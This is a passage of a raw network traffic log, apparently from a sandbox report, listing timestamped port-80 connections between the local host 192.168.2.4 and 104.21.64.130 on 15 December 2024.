                                                            Dec 15, 2024 19:36:45.387346983 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.435445070 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.493597984 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.512571096 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.513375044 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.633400917 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.633495092 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.633913040 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.633913994 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.634032965 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.716994047 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.754448891 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.837529898 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.837579012 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.982326984 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:46.102824926 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:46.102859020 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:46.102912903 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:46.460722923 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:46.513456106 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:46.721240997 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:46.721443892 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:46.763473988 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:46.763480902 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.005464077 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:47.060340881 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.120404959 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.120481968 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.121190071 CET4976380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.393587112 CET8049763104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:47.393754005 CET4976380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.393958092 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:47.394120932 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.394618988 CET8049762104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:47.394678116 CET4976280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.397589922 CET4976380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.518373966 CET8049763104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:47.747931957 CET4976380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:47.868160009 CET8049763104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:47.868204117 CET8049763104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:47.868232012 CET8049763104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:48.488642931 CET8049763104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:48.529170990 CET4976380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:48.739379883 CET8049763104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:48.794728994 CET4976380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:48.858930111 CET4976380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:48.859724045 CET4976480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:48.981117010 CET8049763104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:48.981182098 CET4976380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:48.981307983 CET8049764104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:48.981388092 CET4976480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:48.981509924 CET4976480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:49.101258993 CET8049764104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:49.326411963 CET4976480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:49.447129011 CET8049764104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:49.447176933 CET8049764104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:49.447207928 CET8049764104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:50.070393085 CET8049764104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:50.122848988 CET4976480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:50.312042952 CET8049764104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:50.357357025 CET4976480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:50.434597015 CET4976480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:50.435519934 CET4976580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:50.581089973 CET8049765104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:50.581150055 CET8049764104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:50.581290960 CET4976580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:50.581299067 CET4976480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:50.581423044 CET4976580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:50.701452017 CET8049765104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:50.701971054 CET8049765104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:50.703402996 CET4976680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:50.823213100 CET8049766104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:50.823369026 CET4976680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:50.828325987 CET4976680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:50.948584080 CET8049766104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:51.187767029 CET4976680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:51.307842970 CET8049766104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:51.307874918 CET8049766104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:51.307904005 CET8049766104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:51.733704090 CET4976780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:51.854199886 CET8049767104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:51.854424000 CET4976780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:51.854578018 CET4976780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:51.923800945 CET8049766104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:51.966599941 CET4976680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:51.974462986 CET8049767104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:52.201206923 CET4976780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:52.207075119 CET8049766104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:52.263699055 CET4976680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:52.321118116 CET8049767104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:52.321472883 CET8049767104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:52.324476957 CET4976680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:52.325129986 CET4976880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:52.445207119 CET8049766104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:52.445302010 CET8049768104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:52.445837021 CET4976680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:52.445888042 CET4976880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:52.445888042 CET4976880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:52.566339016 CET8049768104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:52.794797897 CET4976880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:52.914849043 CET8049768104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:52.914907932 CET8049768104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:52.914936066 CET8049768104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:52.939788103 CET8049767104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:52.982434034 CET4976780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:53.207962036 CET8049767104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:53.263600111 CET4976780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:53.531693935 CET8049768104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:53.575962067 CET4976880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:53.789135933 CET8049768104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:53.841792107 CET4976880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:53.928314924 CET4976780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:53.928380013 CET4976880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:53.929157019 CET4976980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:54.049046993 CET8049767104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:54.049146891 CET8049769104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:54.049345016 CET4976980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:54.049356937 CET4976780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:54.049393892 CET4976980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:54.049491882 CET8049768104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:54.049556017 CET4976880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:54.188296080 CET8049769104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:54.404861927 CET4976980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:54.525149107 CET8049769104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:54.525165081 CET8049769104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:54.525177002 CET8049769104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:55.141838074 CET8049769104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:55.185571909 CET4976980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:55.385963917 CET8049769104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:55.435365915 CET4976980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:55.515151024 CET4976980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:55.516156912 CET4977080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:55.637516022 CET8049769104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:55.637706995 CET4976980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:55.637746096 CET8049770104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:55.638072014 CET4977080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:55.643879890 CET4977080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:55.763943911 CET8049770104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:56.009288073 CET4977080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:56.130111933 CET8049770104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:56.130155087 CET8049770104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:56.130183935 CET8049770104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:56.725564957 CET8049770104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:56.779211998 CET4977080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:56.987046957 CET8049770104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:57.029128075 CET4977080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:57.109426022 CET4977080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:57.110651970 CET4977180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:57.230309010 CET8049770104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:57.230448008 CET4977080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:57.231337070 CET8049771104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:57.231461048 CET4977180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:57.231673002 CET4977180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:57.352648020 CET8049771104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:57.576150894 CET4977180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:57.696687937 CET8049771104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:57.696780920 CET8049771104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:57.696815014 CET8049771104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:58.218242884 CET4977280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:58.319809914 CET8049771104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:58.338372946 CET8049772104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:58.338618994 CET4977280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:58.338721991 CET4977280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:58.372984886 CET4977180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:58.459059000 CET8049772104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:58.573551893 CET8049771104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:58.622896910 CET4977180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:58.685787916 CET4977280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:58.702321053 CET4977180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:58.703157902 CET4977380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:58.806071997 CET8049772104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:58.806164026 CET8049772104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:58.823091984 CET8049771104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:58.823307037 CET4977180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:58.823528051 CET8049773104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:58.823704958 CET4977380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:58.823796988 CET4977380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:58.944135904 CET8049773104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:59.169837952 CET4977380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:59.290066004 CET8049773104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:59.290112019 CET8049773104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:59.290141106 CET8049773104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:59.436161995 CET8049772104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:59.482438087 CET4977280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:59.692468882 CET8049772104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:59.732319117 CET4977280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:59.921649933 CET8049773104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:59.966830969 CET4977380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:00.164580107 CET8049773104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:00.216869116 CET4977380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:00.294733047 CET4977280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:00.294913054 CET4977380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:00.295660019 CET4977480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:00.415925026 CET8049772104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:00.416111946 CET4977280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:00.416147947 CET8049774104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:00.416229010 CET8049773104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:00.416284084 CET4977480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:00.416307926 CET4977380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:00.416440964 CET4977480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:00.536225080 CET8049774104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:00.763627052 CET4977480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:00.888289928 CET8049774104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:00.888309002 CET8049774104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:00.888326883 CET8049774104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:01.504556894 CET8049774104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:01.544783115 CET4977480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:01.740034103 CET8049774104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:01.794727087 CET4977480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:01.852951050 CET4977480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:01.853382111 CET4977580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:01.973126888 CET8049775104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:01.973247051 CET8049774104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:01.973356962 CET4977580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:01.973486900 CET4977480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:01.973566055 CET4977580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:02.093259096 CET8049775104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:02.326430082 CET4977580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:02.446377039 CET8049775104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:02.446392059 CET8049775104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:02.446562052 CET8049775104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:03.059873104 CET8049775104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:03.107237101 CET4977580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:03.311392069 CET8049775104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:03.357405901 CET4977580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:03.565604925 CET4977580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:03.566315889 CET4977680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:03.685949087 CET8049775104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:03.686091900 CET4977580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:03.686145067 CET8049776104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:03.686265945 CET4977680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:03.694891930 CET4977680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:03.817579031 CET8049776104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:04.045048952 CET4977680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:04.169104099 CET8049776104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:04.169138908 CET8049776104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:04.169167995 CET8049776104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:04.702409029 CET4977780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:04.775824070 CET8049776104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:04.823632002 CET8049777104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:04.823708057 CET4977780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:04.823810101 CET4977780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:04.825968027 CET4977680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:04.943980932 CET8049777104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:05.073611975 CET8049776104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:05.122948885 CET4977680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:05.169830084 CET4977780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:05.211983919 CET8049776104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:05.263628006 CET4977680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:05.292139053 CET8049777104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:05.292152882 CET8049777104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:05.345526934 CET4977680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:05.346246004 CET4977880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:05.465821028 CET8049776104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:05.465899944 CET4977680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:05.466017962 CET8049778104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:05.466087103 CET4977880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:05.466188908 CET4977880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:05.587021112 CET8049778104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:05.810556889 CET4977880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:05.914911985 CET8049777104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:05.937796116 CET8049778104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:05.937838078 CET8049778104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:05.937865973 CET8049778104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:05.966856003 CET4977780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:06.180558920 CET8049777104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:06.232610941 CET4977780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:06.552443981 CET8049778104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:06.607327938 CET4977880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:06.799824953 CET8049778104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:06.841743946 CET4977880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:06.914546013 CET4977780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:06.914753914 CET4977880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:06.915224075 CET4978080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:07.035481930 CET8049777104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:07.035528898 CET8049780104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:07.035566092 CET8049778104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:07.035738945 CET4977780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:07.035748005 CET4977880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:07.035840988 CET4978080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:07.035840988 CET4978080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:07.156166077 CET8049780104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:07.388855934 CET4978080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:07.509145021 CET8049780104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:07.509166956 CET8049780104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:07.509179115 CET8049780104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:08.129970074 CET8049780104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:08.185571909 CET4978080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:08.373287916 CET8049780104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:08.419811964 CET4978080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:08.565452099 CET8049780104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:08.607336998 CET4978080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:08.682413101 CET4978080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:08.683160067 CET4978280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:08.803206921 CET8049780104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:08.803613901 CET8049782104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:08.803821087 CET4978080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:08.803821087 CET4978280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:08.803869963 CET4978280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:08.923671961 CET8049782104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:09.154298067 CET4978280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:09.274247885 CET8049782104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:09.274260998 CET8049782104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:09.274266958 CET8049782104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:09.890419960 CET8049782104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:09.935396910 CET4978280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:10.145395994 CET8049782104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:10.185393095 CET4978280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:10.266499996 CET4978280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:10.267389059 CET4978880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:10.391726017 CET8049788104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:10.391920090 CET4978880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:10.392338991 CET8049782104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:10.392422915 CET4978880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:10.392504930 CET4978280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:10.512706995 CET8049788104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:10.540150881 CET8049788104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:10.542013884 CET4978980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:10.661806107 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:10.661998034 CET4978980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:10.662281036 CET4978980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:10.782216072 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.013825893 CET4978980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:11.134392023 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.134417057 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.134459019 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.191185951 CET4979080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:11.312125921 CET8049790104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.312648058 CET4979080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:11.312897921 CET4979080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:11.432992935 CET8049790104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.669907093 CET4979080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:11.748574018 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.789861917 CET8049790104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.789875031 CET8049790104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:11.794799089 CET4978980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.029824972 CET8049789104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:37:12.075980902 CET4978980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.151165962 CET4978980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:37:12.151892900 CET4979680192.168.2.4104.21.64.130
